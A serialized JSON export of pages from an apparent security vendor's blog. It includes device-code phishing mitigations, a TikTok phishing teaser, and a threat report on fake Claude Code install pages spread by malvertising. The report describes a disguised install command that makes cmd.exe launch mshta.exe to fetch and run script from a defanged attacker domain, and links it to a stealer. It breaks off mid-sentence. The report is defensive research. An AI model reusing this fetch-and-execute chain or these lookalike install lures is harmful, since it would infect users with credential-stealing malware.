6",{"sys":12066,"__typename":5311,"content":12067,"name":12091,"title":118},{"id":11702},{"json":12068},{"nodeType":165,"data":12069,"content":12070},{},[12071],{"nodeType":178,"data":12072,"content":12073},{},[12074,12078,12087],{"nodeType":173,"value":12075,"marks":12076,"data":12077},"Another Microsoft option is to prevent users from signing into first-party apps by ",[],{},{"nodeType":186,"data":12079,"content":12081},{"uri":12080},"https://msendpointmgr.com/2026/01/08/consentfix-quickfix/",[12082],{"nodeType":173,"value":12083,"marks":12084,"data":12086},"pre-creating service principals for apps and requiring user assignment",[12085],{"type":194},{},{"nodeType":173,"value":12088,"marks":12089,"data":12090}," (also an option to mitigate broader OAuth attacks, including ConsentFix). This can limit which users can authenticate to specific apps without approval, but needs to be done for every first-party app deemed a risk.",[],{},"DCP IB 7",{"sys":12093,"__typename":5345,"title":12094,"caption":12095,"layoutMode":118,"file":12096},{"id":11760},"DCP warning banner","Users visiting a device code login page will be required to click through a warning banner, emitting a webhook event.",{"url":12097,"width":12098,"height":12099},"https://images.ctfassets.net/y1cdw1ablpvd/2Gtct2qofWtLLVi31Pk8NY/616e56fc4fa7dcb905a0a3a1ca28709b/image17.png",1367,859,"content:blog:device-code-phishing.json","blog/device-code-phishing.json","blog/device-code-phishing",{"_path":12104,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":12105,"ogImage":118,"summary":12108,"title":12119,"subtitle":118,"metaTitle":12120,"synopsis":12121,"hashTags":118,"publishedDate":12122,"slug":12123,"tagsCollection":12124,"relatedBlogPostsCollection":12130,"authorsCollection":14595,"content":14599,"_id":15278,"_type":5439,"_source":5440,"_file":15279,"_stem":15280,"_extension":5439},"/blog/tiktok-phishing",{"id":12106,"publishedAt":12107},"1iOnp8gcu1tEUvkqOZsdFd","2026-03-26T07:59:36.622Z",{"json":12109},{"data":12110,"content":12111,"nodeType":165},{},[12112],{"data":12113,"content":12114,"nodeType":178},{},[12115],{"data":12116,"marks":12117,"value":12118,"nodeType":173},{},[],"We’ve identified a new wave of AITM phishing pages designed to hijack TikTok accounts. This seems like a weird target at first glance, but TikTok accounts are ripe for abuse in malvertising scams. ","Attackers are now targeting business TikTok accounts using session-stealing phishing kits","Business TikTok accounts targeted with AITM phishing kits","Investigating a new wave of AITM phishing pages designed to hijack TikTok accounts.","2026-03-26T00:00:00.000Z","tiktok-phishing",{"items":12125},[12126,12128],{"sys":12127,"name":505},{"id":504},{"sys":12129,"name":509},{"id":508},{"items":12131},[12132,12960,13982],{"__typename":1528,"sys":12133,"content":12134,"title":1480,"synopsis":1481,"hashTags":118,"publishedDate":1482,"slug":1483,"tagsCollection":12950,"authorsCollection":12956},{"id":519},{"json":12135},{"nodeType":165,"data":12136,"content":12137},{},[12138,12144,12150,12156,12159,12166,12172,12178,12183,12189,12194,12210,12216,12226,12229,12236,12242,12255,12261,12271,12276,12279,12286,12293,12298,12306,12322,12330,12336,12344,12359,12367,12373,12381,12407,12415,12421,12429,12445,12450,12458,12464,12472,12505,12508,12515,12523,12539,12547,12553,12561,12587,12592,12600,12606,12611,12614,12621,12629,12635,12686,12691,12694,12701,12709,12715,12720,12723,12730,12736,12742,12802,12808,12863,12869,12872,12879,12885,12891,12896,12899,12906,12912,12918,12924],{"nodeType":178,"data":12139,"content":12140},{},[12141],{"nodeType":173,"value":528,"marks":12142,"data":12143},[],{},{"nodeType":178,"data":12145,"content":12146},{},[12147],{"nodeType":173,"value":535,"marks":12148,"data":12149},[],{},{"nodeType":178,"data":12151,"content":12152},{},[12153],{"nodeType":173,"value":542,"marks":12154,"data":12155},[],{},{"nodeType":231,"data":12157,"content":12158},{},[],{"nodeType":169,"data":12160,"content":12161},{},[12162],{"nodeType":173,"value":552,"marks":12163,"data":12165},[12164],{"type":370},{},{"nodeType":178,"data":12167,"content":12168},{},[12169],{"nodeType":173,"value":560,"marks":12170,"data":12171},[],{},{"nodeType":178,"data":12173,"content":12174},{},[12175],{"nodeType":173,"value":567,"marks":12176,"data":12177},[],{},{"nodeType":312,"data":12179,"content":12182},{"target":12180},{"sys":12181},{"id":574,"type":317,"linkType":318},[],{"nodeType":178,"data":12184,"content":12185},{},[12186],{"nodeType":173,"value":580,"marks":12187,"data":12188},[],{},{"nodeType":312,"data":12190,"content":12193},{"target":12191},{"sys":12192},{"id":587,"type":317,"linkType":318},[],{"nodeType":178,"data":12195,"content":12196},{},[12197,12200,12207],{"nodeType":173,"value":593,"marks":12198,"data":12199},[],{},{"nodeType":186,"data":12201,"content":12202},{"uri":598},[12203],{"nodeType":173,"value":601,"marks":12204,"data":12206},[12205],{"type":194},{},{"nodeType":173,"value":606,"marks":12208,"data":12209},[],{},{"nodeType":178,"data":12211,"content":12212},{},[12213],{"nodeType":173,"value":613,"marks":12214,"data":12215},[],{},{"nodeType":178,"data":12217,"content":12218},{},[12219,12222],{"nodeType":173,"value":620,"marks":12220,"data":12221},[],{},{"nodeType":173,"value":624,"marks":12223,"data":12225},[12224],{"type":370},{},{"nodeType":231,"data":12227,"content":12228},{},[],{"nodeType":169,"data":12230,"content":12231},{},[12232],{"nodeType":173,"value":635,"marks":12233,"data":12235},[12234],{"type":370},{},{"nodeType":178,"data":12237,"content":12238},{},[12239],{"nodeType":173,"value":643,"marks":12240,"data":12241},[],{},{"nodeType":178,"data":12243,"content":12244},{},[12245,12248,12252],{"nodeType":173,"value":650,"marks":12246,"data":12247},[],{},{"nodeType":173,"value":654,"marks":12249,"data":12251},[12250],{"type":370},{},{"nodeType":173,"value":659,"marks":12253,"data":12254},[],{},{"nodeType":178,"data":12256,"content":12257},{},[12258],{"nodeType":173,"value":666,"marks":12259,"data":12260},[],{},{"nodeType":178,"data":12262,"content":12263},{},[12264,12267],{"nodeType":173,"value":673,"marks":12265,"data":12266},[],{},{"nodeType":173,"value":677,"marks":12268,"data":12270},[12269],{"type":370},{},{"nodeType":312,"data":12272,"content":12275},{"target":12273},{"sys":12274},{"id":685,"type":317,"linkType":318},[],{"nodeType":231,"data":12277,"content":12278},{},[],{"nodeType":169,"data":12280,"content":12281},{},[12282],{"nodeType":173,"value":694,"marks":12283,"data":12285},[12284],{"type":370},{},{"nodeType":235,"data":12287,"content":12288},{},[12289],{"nodeType":173,"value":702,"marks":12290,"data":12292},[12291],{"type":370},{},{"nodeType":312,"data":12294,"content":12297},{"target":12295},{"sys":12296},{"id":710,"type":317,"linkType":318},[],{"nodeType":178,"data":12299,"content":12300},{},[12301],{"nodeType":173,"value":716,"marks":12302,"data":12305},[12303,12304],{"type":370},{"type":194},{},{"nodeType":178,"data":12307,"content":12308},{},[12309,12312,12319],{"nodeType":173,"value":725,"marks":12310,"data":12311},[],{},{"nodeType":186,"data":12313,"content":12314},{"uri":730},[12315],{"nodeType":173,"value":733,"marks":12316,"data":12318},[12317],{"type":194},{},{"nodeType":173,"value":738,"marks":12320,"data":12321},[],{},{"nodeType":178,"data":12323,"content":12324},{},[12325],{"nodeType":173,"value":745,"marks":12326,"data":12329},[12327,12328],{"type":370},{"type":194},{},{"nodeType":178,"data":12331,"content":12332},{},[12333],{"nodeType":173,"value":754,"marks":12334,"data":12335},[],{},{"nodeType":178,"data":12337,"content":12338},{},[12339],{"nodeType":173,"value":761,"marks":12340,"data":12343},[12341,12342],{"type":370},{"type":194},{},{"nodeType":178,"data":12345,"content":12346},{},[12347,12350,12356],{"nodeType":173,"value":770,"marks":12348,"data":12349},[],{},{"nodeType":186,"data":12351,"content":12352},{"uri":775},[12353],{"nodeType":173,"value":778,"marks":12354,"data":12355},[],{},{"nodeType":173,"value":782,"marks":12357,"data":12358},[],{},{"nodeType":178,"data":12360,"content":12361},{},[12362],{"nodeType":173,"value":789,"marks":12363,"data":12366},[12364,12365],{"type":370},{"type":194},{},{"nodeType":178,"data":12368,"content":12369},{},[12370],{"nodeType":173,"value":798,"marks":12371,"data":12372},[],{},{"nodeType":178,"data":12374,"content":12375},{},[12376],{"nodeType":173,"value":805,"marks":12377,"data":12380},[12378,12379],{"type":370},{"type":194},{},{"nodeType":178,"data":12382,"content":12383},{},[12384,12387,12394,12397,12404],{"nodeType":173,"value":814,"marks":12385,"data":12386},[],{},{"nodeType":186,"data":12388,"content":12389},{"uri":819},[12390],{"nodeType":173,"value":822,"marks":12391,"data":12393},[12392],{"type":194},{},{"nodeType":173,"value":827,"marks":12395,"data":12396},[],{},{"nodeType":186,"data":12398,"content":12399},{"uri":832},[12400],{"nodeType":173,"value":835,"marks":12401,"data":12403},[12402],{"type":194},{},{"nodeType":173,"value":840,"marks":12405,"data":12406},[],{},{"nodeType":178,"data":12408,"content":12409},{},[12410],{"nodeType":173,"value":847,"marks":12411,"data":12414},[12412,12413],{"type":370},{"type":194},{},{"nodeType":178,"data":12416,"content":12417},{},[12418],{"nodeType":173,"value":856,"marks":12419,"data":12420},[],{},{"nodeType":178,"data":12422,"content":12423},{},[12424],{"nodeType":173,"value":863,"marks":12425,"data":12428},[12426,12427],{"type":370},{"type":194},{},{"nodeType":178,"data":12430,"content":12431},{},[12432,12435,12442],{"nodeType":173,"value":872,"marks":12433,"data":12434},[],{},{"nodeType":186,"data":12436,"content":12437},{"uri":832},[12438],{"nodeType":173,"value":835,"marks":12439,"data":12441},[12440],{"type":194},{},{"nodeType":173,"value":883,"marks":12443,"data":12444},[],{},{"nodeType":312,"data":12446,"content":12449},{"target":12447},{"sys":12448},{"id":890,"type":317,"linkType":318},[],{"nodeType":178,"data":12451,"content":12452},{},[12453],{"nodeType":173,"value":896,"marks":12454,"data":12457},[12455,12456],{"type":370},{"type":194},{},{"nodeType":178,"data":12459,"content":12460},{},[12461],{"nodeType":173,"value":905,"marks":12462,"data":12463},[],{},{"nodeType":178,"data":12465,"content":12466},{},[12467],{"nodeType":173,"value":912,"marks":12468,"data":12471},[12469,12470],{"type":370},{"type":194},{},{"nodeType":178,"data":12473,"content":12474},{},[12475,12478,12484,12487,12493,12496,12502],{"nodeType":173,"value":921,"marks":12476,"data":12477},[],{},{"nodeType":186,"data":12479,"content":12480},{"uri":926},[12481],{"nodeType":173,"value":929,"marks":12482,"data":12483},[],{},{"nodeType":173,"value":933,"marks":12485,"data":12486},[],{},{"nodeType":186,"data":12488,"content":12489},{"uri":938},[12490],{"nodeType":173,"value":941,"marks":12491,"data":12492},[],{},{"nodeType":173,"value":945,"marks":12494,"data":12495},[],{},{"nodeType":186,"data":12497,"content":12498},{"uri":950},[12499],{"nodeType":173,"value":953,"marks":12500,"data":12501},[],{},{"nodeType":173,"value":957,"marks":12503,"data":12504},[],{},{"nodeType":231,"data":12506,"content":12507},{},[],{"nodeType":235,"data":12509,"content":12510},{},[12511],{"nodeType":173,"value":967,"marks":12512,"data":12514},[12513],{"type":370},{},{"nodeType":178,"data":12516,"content":12517},{},[12518],{"nodeType":173,"value":975,"marks":12519,"data":12522},[12520,12521],{"type":370},{"type":194},{},{"nodeType":178,"data":12524,"content":12525},{},[12526,12529,12536],{"nodeType":173,"value":984,"marks":12527,"data":12528},[],{},{"nodeType":186,"data":12530,"content":12531},{"uri":989},[12532],{"nodeType":173,"value":992,"marks":12533,"data":12535},[12534],{"type":194},{},{"nodeType":173,"value":997,"marks":12537,"data":12538},[],{},{"nodeType":178,"data":12540,"content":12541},{},[12542],{"nodeType":173,"value":1004,"marks":12543,"data":12546},[12544,12545],{"type":370},{"type":194},{},{"nodeType":178,"data":12548,"content":12549},{},[12550],{"nodeType":173,"value":1013,"marks":12551,"data":12552},[],{},{"nodeType":178,"data":12554,"content":12555},{},[12556],{"nodeType":173,"value":1020,"marks":12557,"data":12560},[12558,12559],{"type":370},{"type":194},{},{"nodeType":178,"data":12562,"content":12563},{},[12564,12567,12574,12577,12584],{"nodeType":173,"value":1029,"marks":12565,"data":12566},[],{},{"nodeType":186,"data":12568,"content":12569},{"uri":1034},[12570],{"nodeType":173,"value":1037,"marks":12571,"data":12573},[12572],{"type":194},{},{"nodeType":173,"value":1042,"marks":12575,"data":12576},[],{},{"nodeType":186,"data":12578,"content":12579},{"uri":1047},[12580],{"nodeType":173,"value":1050,"marks":12581,"data":12583},[12582],{"type":194},{},{"nodeType":173,"value":1055,"marks":12585,"data":12586},[],{},{"nodeType":312,"data":12588,"content":12591},{"target":12589},{"sys":12590},{"id":1062,"type":317,"linkType":318},[],{"nodeType":178,"data":12593,"content":12594},{},[12595],{"nodeType":173,"value":1068,"marks":12596,"data":12599},[12597,12598],{"type":370},{"type":194},{},{"nodeType":178,"data":12601,"content":12602},{},[12603],{"nodeType":173,"value":1077,"marks":12604,"data":12605},[],{},{"nodeType":312,"data":12607,"content":12610},{"target":12608},{"sys":12609},{"id":1084,"type":317,"linkType":318},[],{"nodeType":231,"data":12612,"content":12613},{},[],{"nodeType":235,"data":12615,"content":12616},{},[12617],{"nodeType":173,"value":1093,"marks":12618,"data":12620},[12619],{"type":370},{},{"nodeType":178,"data":12622,"content":12623},{},[12624],{"nodeType":173,"value":1101,"marks":12625,"data":12628},[12626,12627],{"type":370},{"type":194},{},{"nodeType":178,"data":12630,"content":12631},{},[12632],{"nodeType":173,"value":1110,"marks":12633,"data":12634},[],{},{"nodeType":250,"data":12636,"content":12637},{},[12638,12651,12664],{"nodeType":254,"data":12639,"content":12640},{},[12641],{"nodeType":178,"data":12642,"content":12643},{},[12644,12648],{"nodeType":173,"value":1123,"marks":12645,"data":12647},[12646],{"type":370},{},{"nodeType":173,"value":1128,"marks":12649,"data":12650},[],{},{"nodeType":254,"data":12652,"content":12653},{},[12654],{"nodeType":178,"data":12655,"content":12656},{},[12657,12661],{"nodeType":173,"value":1138,"marks":12658,"data":12660},[12659],{"type":370},{},{"nodeType":173,"value":1143,"marks":12662,"data":12663},[],{},{"nodeType":254,"data":12665,"content":12666},{},[12667],{"nodeType":178,"data":12668,"content":12669},{},[12670,12674,12677,12683],{"nodeType":173,"value":1153,"marks":12671,"data":12673},[12672],{"type":370},{},{"nodeType":173,"value":1158,"marks":12675,"data":12676},[],{},{"nodeType":186,"data":12678,"content":12679},{"uri":1163},[12680],{"nodeType":173,"value":1166,"marks":12681,"data":12682},[],{},{"nodeType":173,"value":1170,"marks":12684,"data":12685},[],{},{"nodeType":312,"data":12687,"content":12690},{"target":12688},{"sys":12689},{"id":1177,"type":317,"linkType":318},[],{"nodeType":231,"data":12692,"content":12693},{},[],{"nodeType":235,"data":12695,"content":12696},{},[12697],{"nodeType":173,"value":1186,"marks":12698,"data":12700},[12699],{"type":370},{},{"nodeType":178,"data":12702,"content":12703},{},[12704],{"nodeType":173,"value":1194,"marks":12705,"data":12708},[12706,12707],{"type":370},{"type":194},{},{"nodeType":178,"data":12710,"content":12711},{},[12712],{"nodeType":173,"value":1203,"marks":12713,"data":12714},[],{},{"nodeType":312,"data":12716,"content":12719},{"target":12717},{"sys":12718},{"id":1210,"type":317,"linkType":318},[],{"nodeType":231,"data":12721,"content":12722},{},[],{"nodeType":169,"data":12724,"content":12725},{},[12726],{"nodeType":173,"value":1219,"marks":12727,"data":12729},[12728],{"type":370},{},{"nodeType":178,"data":12731,"content":12732},{},[12733],{"nodeType":173,"value":1227,"marks":12734,"data":12735},[],{},{"nodeType":178,"data":12737,"content":12738},{},[12739],{"nodeType":173,"value":1234,"marks":12740,"data":12741},[],{},{"nodeType":250,"data":12743,"content":12744},{},[12745,12764,12783],{"nodeType":254,"data":12746,"content":12747},{},[12748],{"nodeType":178,"data":12749,"content":12750},{},[12751,12754,12761],{"nodeType":173,"value":1247,"marks":12752,"data":12753},[],{},{"nodeType":186,"data":12755,"content":12756},{"uri":1252},[12757],{"nodeType":173,"value":1255,"marks":12758,"data":12760},[12759],{"type":194},{},{"nodeType":173,"value":1260,"marks":12762,"data":12763},[],{},{"nodeType":254,"data":12765,"content":12766},{},[12767],{"nodeType":178,"data":12768,"content":12769},{},[12770,12773,12780],{"nodeType":173,"value":1270,"marks":12771,"data":12772},[],{},{"nodeType":186,"data":12774,"content":12775},{"uri":1275},[12776],{"nodeType":173,"value":1278,"marks":12777,"data":12779},[12778],{"type":194},{},{"nodeType":173,"value":1260,"marks":12781,"data":12782},[],{},{"nodeType":254,"data":12784,"content":12785},{},[12786],{"nodeType":178,"data":12787,"content":12788},{},[12789,12792,12799],{"nodeType":173,"value":1292,"marks":12790,"data":12791},[],{},{"nodeType":186,"data":12793,"content":12794},{"uri":1297},[12795],{"nodeType":173,"value":1300,"marks":12796,"data":12798},[12797],{"type":194},{},{"nodeType":173,"value":1260,"marks":12800,"data":12801},[],{},{"nodeType":178,"data":12803,"content":12804},{},[12805],{"nodeType":173,"value":1311,"marks":12806,"data":12807},[],{},{"nodeType":250,"data":12809,"content":12810},{},[12811,12824,12837,12850],{"nodeType":254,"data":12812,"content":12813},{},[12814],{"nodeType":178,"data":12815,"content":12816},{},[12817,12821],{"nodeType":173,"value":1324,"marks":12818,"data":12820},[12819],{"type":370},{},{"nodeType":173,"value":1329,"marks":12822,"data":12823},[],{},{"nodeType":254,"data":12825,"content":12826},{},[12827],{"nodeType":178,"data":12828,"content":12829},{},[12830,12834],{"nodeType":173,"value":1339,"marks":12831,"data":12833},[12832],{"type":370},{},{"nodeType":173,"value":1344,"marks":12835,"data":12836},[],{},{"nodeType":254,"data":12838,"content":12839},{},[12840],{"nodeType":178,"data":12841,"content":12842},{},[12843,12847],{"nodeType":173,"value":1354,"marks":12844,"data":12846},[12845],{"type":370},{},{"nodeType":173,"value":1359,"marks":12848,"data":12849},[],{},{"nodeType":254,"data":12851,"content":12852},{},[12853],{"nodeType":178,"data":12854,"content":12855},{},[12856,12860],{"nodeType":173,"value":1369,"marks":12857,"data":12859},[12858],{"type":370},{},{"nodeType":173,"value":1374,"marks":12861,"data":12862},[],{},{"nodeType":178,"data":12864,"content":12865},{},[12866],{"nodeType":173,"value":1381,"marks":12867,"data":12868},[],{},{"nodeType":231,"data":12870,"content":12871},{},[],{"nodeType":169,"data":12873,"content":12874},{},[12875],{"nodeType":173,"value":1391,"marks":12876,"data":12878},[12877],{"type":370},{},{"nodeType":178,"data":12880,"content":12881},{},[12882],{"nodeType":173,"value":1399,"marks":12883,"data":12884},[],{},{"nodeType":178,"data":12886,"content":12887},{},[12888],{"nodeType":173,"value":1406,"marks":12889,"data":12890},[],{},{"nodeType":312,"data":12892,"content":12895},{"target":12893},{"sys":12894},{"id":1413,"type":317,"linkType":318},[],{"nodeType":231,"data":12897,"content":12898},{},[],{"nodeType":169,"data":12900,"content":12901},{},[12902],{"nodeType":173,"value":1422,"marks":12903,"data":12905},[12904],{"type":370},{},{"nodeType":178,"data":12907,"content":12908},{},[12909],{"nodeType":173,"value":1430,"marks":12910,"data":12911},[],{},{"nodeType":178,"data":12913,"content":12914},{},[12915],{"nodeType":173,"value":1437,"marks":12916,"data":12917},[],{},{"nodeType":178,"data":12919,"content":12920},{},[12921],{"nodeType":173,"value":1444,"marks":12922,"data":12923},[],{},{"nodeType":178,"data":12925,"content":12926},{},[12927,12930,12937,12940,12947],{"nodeType":173,"value":1451,"marks":12928,"data":12929},[],{},{"nodeType":186,"data":12931,"content":12932},{"uri":1456},[12933],{"nodeType":173,"value":1459,"marks":12934,"data":12936},[12935],{"type":194},{},{"nodeType":173,"value":1464,"marks":12938,"data":12939},[],{},{"nodeType":186,"data":12941,"content":12942},{"uri":1469},[12943],{"nodeType":173,"value":1472,"marks":12944,"data":12946},[12945],{"type":194},{},{"nodeType":173,"value":1477,"marks":12948,"data":12949},[],{},{"items":12951},[12952,12954],{"sys":12953,"name":505},{"id":504},{"sys":12955,"name":509},{"id":508},{"items":12957},[12958],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":12959},{"url":1496},{"__typename":1528,"sys":12961,"content":12963,"title":13964,"synopsis":13965,"hashTags":118,"publishedDate":13966,"slug":13967,"tagsCollection":13968,"authorsCollection":13974},{"id":12962},"7bG71Eo43crbIHKzczooVS",{"json":12964},{"nodeType":165,"data":12965,"content":12966},{},[12967,12973,12980,12987,12995,13011,13017,13020,13028,13035,13042,13049,13056,13063,13070,13077,13084,13090,13096,13103,13109,13116,13123,13129,13135,13141,13147,13167,13179,13186,13192,13199,13206,13239,13246,13254,13261,13267,13274,13280,13287,13305,13312,13315,13323,13330,13425,13432,13438,13441,13449,13456,13463,13470,13507,13510,13517,13535,13542,13550,13760,13768,13801,13809,13818,13824,13832,13839,13847,13858,13866,13872,13880,13891,13899,13907,13915,13923,13930,13938,13949,13956],{"nodeType":312,"data":12968,"content":12972},{"target":12969},{"sys":12970},{"id":12971,"type":317,"linkType":318},"38JCcRQe2tN9ooHGwreoF5",[],{"nodeType":178,"data":12974,"content":12975},{},[12976],{"nodeType":173,"value":12977,"marks":12978,"data":12979},"There was a time, not that long ago, when pasting a command from a website straight into your terminal was something you’d only try once before some grizzled senior engineer beat it out of you. That’s because you’re effectively handing a website a blank cheque to execute whatever it wants on your system.",[],{},{"nodeType":178,"data":12981,"content":12982},{},[12983],{"nodeType":173,"value":12984,"marks":12985,"data":12986},"But somehow, it’s now the default. Homebrew, Rust, nvm, Bun, oh-my-zsh and hundreds of the most widely used developer tools on the planet now ship with the same instructions. Copy a “curl to bash” ( curl https://some.website | bash) one-liner from a website, paste it into your terminal, and hit enter. The entire security model boils down to \"trust the domain.\" And with AI adoption encouraging more non-technical users to work with the kind of tools that only devs used to use, this suddenly becomes a threat to a much larger, less security conscious pool of users.",[],{},{"nodeType":178,"data":12988,"content":12989},{},[12990],{"nodeType":173,"value":12991,"marks":12992,"data":12994},"It’s not hard to see how attackers can exploit this. ",[12993],{"type":370},{},{"nodeType":178,"data":12996,"content":12997},{},[12998,13002,13007],{"nodeType":173,"value":12999,"marks":13000,"data":13001},"We're tracking a technique we're calling ",[],{},{"nodeType":173,"value":13003,"marks":13004,"data":13006},"InstallFix",[13005],{"type":370},{},{"nodeType":173,"value":13008,"marks":13009,"data":13010},": a clever social engineering attack where threat actors clone the installation pages of legitimate CLI tools and present victims with malicious install commands disguised as the real thing. In each case, the mechanic is the same: the victim sees what looks like a familiar install command, copies it, pastes it, and runs it. Except the command they run is not the one they expected.",[],{},{"nodeType":312,"data":13012,"content":13016},{"target":13013},{"sys":13014},{"id":13015,"type":317,"linkType":318},"6VMkuQkU5L0vObxIojI1Xw",[],{"nodeType":231,"data":13018,"content":13019},{},[],{"nodeType":169,"data":13021,"content":13022},{},[13023],{"nodeType":173,"value":13024,"marks":13025,"data":13027},"InstallFix Claude Code campaign teardown",[13026],{"type":370},{},{"nodeType":178,"data":13029,"content":13030},{},[13031],{"nodeType":173,"value":13032,"marks":13033,"data":13034},"All you need to make this attack work is a popular tool you can impersonate. Naturally, this makes trendy AI tools a popular choice. Then, you just need to boost your lure to deliver it to unsuspecting victims via search engine. The most common way of doing this is through sponsored results — aka malvertising. ",[],{},{"nodeType":178,"data":13036,"content":13037},{},[13038],{"nodeType":173,"value":13039,"marks":13040,"data":13041},"In the recent examples identified by Push researchers, attackers have simply cloned the installation webpages for tools and updated the installation instructions with malicious commands. ",[],{},{"nodeType":235,"data":13043,"content":13044},{},[13045],{"nodeType":173,"value":13046,"marks":13047,"data":13048},"A new campaign targeting Claude Code",[],{},{"nodeType":178,"data":13050,"content":13051},{},[13052],{"nodeType":173,"value":13053,"marks":13054,"data":13055},"We've recently observed a campaign that puts this technique into practice against one of the fastest-growing developer tools on the market: Anthropic's Claude Code.",[],{},{"nodeType":178,"data":13057,"content":13058},{},[13059],{"nodeType":173,"value":13060,"marks":13061,"data":13062},"Claude Code is a command-line AI coding assistant that has rapidly become the go-to for both experienced developers and amateur vibe-coders. Like many modern CLI tools, the recommended installation method is a one-liner that pipes a remote script into a shell. ",[],{},{"nodeType":178,"data":13064,"content":13065},{},[13066],{"nodeType":173,"value":13067,"marks":13068,"data":13069},"The attacker's approach is straightforward. They clone the Claude Code installation page (layout, branding, documentation sidebar, and all), hosting it on a lookalike domain. The page is a near-pixel-perfect replica of the real thing. The only meaningful difference is in the installation commands themselves: instead of fetching the install script from claude.ai, the commands point to an attacker-controlled server that serves malware instead. ",[],{},{"nodeType":178,"data":13071,"content":13072},{},[13073],{"nodeType":173,"value":13074,"marks":13075,"data":13076},"Unless you’re carefully reading the URL embedded in the install one-liner (and let's be honest, almost nobody does these days), the page is indistinguishable from the real one.",[],{},{"nodeType":178,"data":13078,"content":13079},{},[13080],{"nodeType":173,"value":13081,"marks":13082,"data":13083},"You can see a video of a user being served a malicious InstallFix page below.",[],{},{"nodeType":312,"data":13085,"content":13089},{"target":13086},{"sys":13087},{"id":13088,"type":317,"linkType":318},"1dhirnghbpAwyCse8cjAas",[],{"nodeType":312,"data":13091,"content":13095},{"target":13092},{"sys":13093},{"id":13094,"type":317,"linkType":318},"5TBnCFM4Y5CoqKPchHDpyv",[],{"nodeType":178,"data":13097,"content":13098},{},[13099],{"nodeType":173,"value":13100,"marks":13101,"data":13102},"Any further interaction on the page simply redirects you to the legitimate site, too. So a victim that lands on the page and follows the fake instructions could continue normally without realizing anything had gone wrong. ",[],{},{"nodeType":312,"data":13104,"content":13108},{"target":13105},{"sys":13106},{"id":13107,"type":317,"linkType":318},"5g3joJSAP8y8xv2bKaLGe2",[],{"nodeType":235,"data":13110,"content":13111},{},[13112],{"nodeType":173,"value":13113,"marks":13114,"data":13115},"Distribution via Google Ads",[],{},{"nodeType":178,"data":13117,"content":13118},{},[13119],{"nodeType":173,"value":13120,"marks":13121,"data":13122},"The fake install pages are distributed exclusively through Google Ads, specifically through sponsored search results that appear when users search for terms like \"Claude Code\", \"Claude Code install\", or \"Claude Code CLI.\"",[],{},{"nodeType":312,"data":13124,"content":13128},{"target":13125},{"sys":13126},{"id":13127,"type":317,"linkType":318},"3CTtrOy3q8NoMblxkLlTer",[],{"nodeType":312,"data":13130,"content":13134},{"target":13131},{"sys":13132},{"id":13133,"type":317,"linkType":318},"4m5rg9UhRQK0e8OfYFlIUc",[],{"nodeType":312,"data":13136,"content":13140},{"target":13137},{"sys":13138},{"id":13139,"type":317,"linkType":318},"25lAkq9tTZ2Mq52gs6xR8G",[],{"nodeType":312,"data":13142,"content":13146},{"target":13143},{"sys":13144},{"id":13145,"type":317,"linkType":318},"4f4svuW3tjhNc3kEfCwNRG",[],{"nodeType":178,"data":13148,"content":13149},{},[13150,13154,13163],{"nodeType":173,"value":13151,"marks":13152,"data":13153},"Malvertising via Google Search is an effective delivery vector because it bypasses email-based security controls entirely. There's no phishing email to flag, no suspicious link in a message. The user initiates the interaction themselves by searching for something they genuinely intend to install. This is one of the reasons that attackers are ",[],{},{"nodeType":186,"data":13155,"content":13157},{"uri":13156},"https://pushsecurity.com/blog/cyber-criminal-ecosystem-analysis/",[13158],{"nodeType":173,"value":13159,"marks":13160,"data":13162},"doubling down on targeting ad manager accounts",[13161],{"type":194},{},{"nodeType":173,"value":13164,"marks":13165,"data":13166}," to be able to hijack existing ad budgets and spin up even more malicious ads.",[],{},{"nodeType":178,"data":13168,"content":13169},{},[13170,13175],{"nodeType":173,"value":13171,"marks":13172,"data":13174},"The reality is that users are going to encounter malicious links through stealthy channels like malvertising every day, just through normal internet browsing",[13173],{"type":370},{},{"nodeType":173,"value":13176,"marks":13177,"data":13178},", without being actively targeted. That said, ads can be targeted too: Google Ads can be tuned to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). So if you've got sufficient intel on your target, you can tailor the ad accordingly. ",[],{},{"nodeType":178,"data":13180,"content":13181},{},[13182],{"nodeType":173,"value":13183,"marks":13184,"data":13185},"Since the sponsored result appears above the organic results for the legitimate Claude Code documentation and the displayed URL in the ad appears plausible, victims are more likely to quickly click and access the domain without checking it out fully. Search engines typically suppress subdomains from displayed URLs too, giving the attacker additional cover for the lookalike domain.",[],{},{"nodeType":312,"data":13187,"content":13191},{"target":13188},{"sys":13189},{"id":13190,"type":317,"linkType":318},"4Ihz5BcRK0NDVy0ANg2PWe",[],{"nodeType":235,"data":13193,"content":13194},{},[13195],{"nodeType":173,"value":13196,"marks":13197,"data":13198},"The payload",[],{},{"nodeType":178,"data":13200,"content":13201},{},[13202],{"nodeType":173,"value":13203,"marks":13204,"data":13205},"The malware initiates execution through cmd.exe (PID 8444), which spawns mshta.exe (PID 8700) to retrieve and execute content from a remote URL. The command structure indicates staged execution:",[],{},{"nodeType":250,"data":13207,"content":13208},{},[13209,13219,13229],{"nodeType":254,"data":13210,"content":13211},{},[13212],{"nodeType":178,"data":13213,"content":13214},{},[13215],{"nodeType":173,"value":13216,"marks":13217,"data":13218},"cmd.exe executes a command-line instruction to launch mshta.exe with a URL parameter pointing to https://claude[.]update-version[.]com/claude",[],{},{"nodeType":254,"data":13220,"content":13221},{},[13222],{"nodeType":178,"data":13223,"content":13224},{},[13225],{"nodeType":173,"value":13226,"marks":13227,"data":13228},"mshta.exe (child process) is invoked to fetch and execute HTML/script content from the malicious domain",[],{},{"nodeType":254,"data":13230,"content":13231},{},[13232],{"nodeType":178,"data":13233,"content":13234},{},[13235],{"nodeType":173,"value":13236,"marks":13237,"data":13238},"conhost.exe (PID 8496) is spawned as a console host, likely to support command execution output",[],{},{"nodeType":178,"data":13240,"content":13241},{},[13242],{"nodeType":173,"value":13243,"marks":13244,"data":13245},"The MacOS payload also uses additional encoding and staged execution layers.",[],{},{"nodeType":178,"data":13247,"content":13248},{},[13249],{"nodeType":173,"value":13250,"marks":13251,"data":13253},"You can see the full list of IoCs at the end of the blog.   ",[13252],{"type":370},{},{"nodeType":178,"data":13255,"content":13256},{},[13257],{"nodeType":173,"value":13258,"marks":13259,"data":13260},"Our analysis shows us that the payload matches the Yara signatures for the Amatera Stealer malware, retrieved from the command-and-control domain 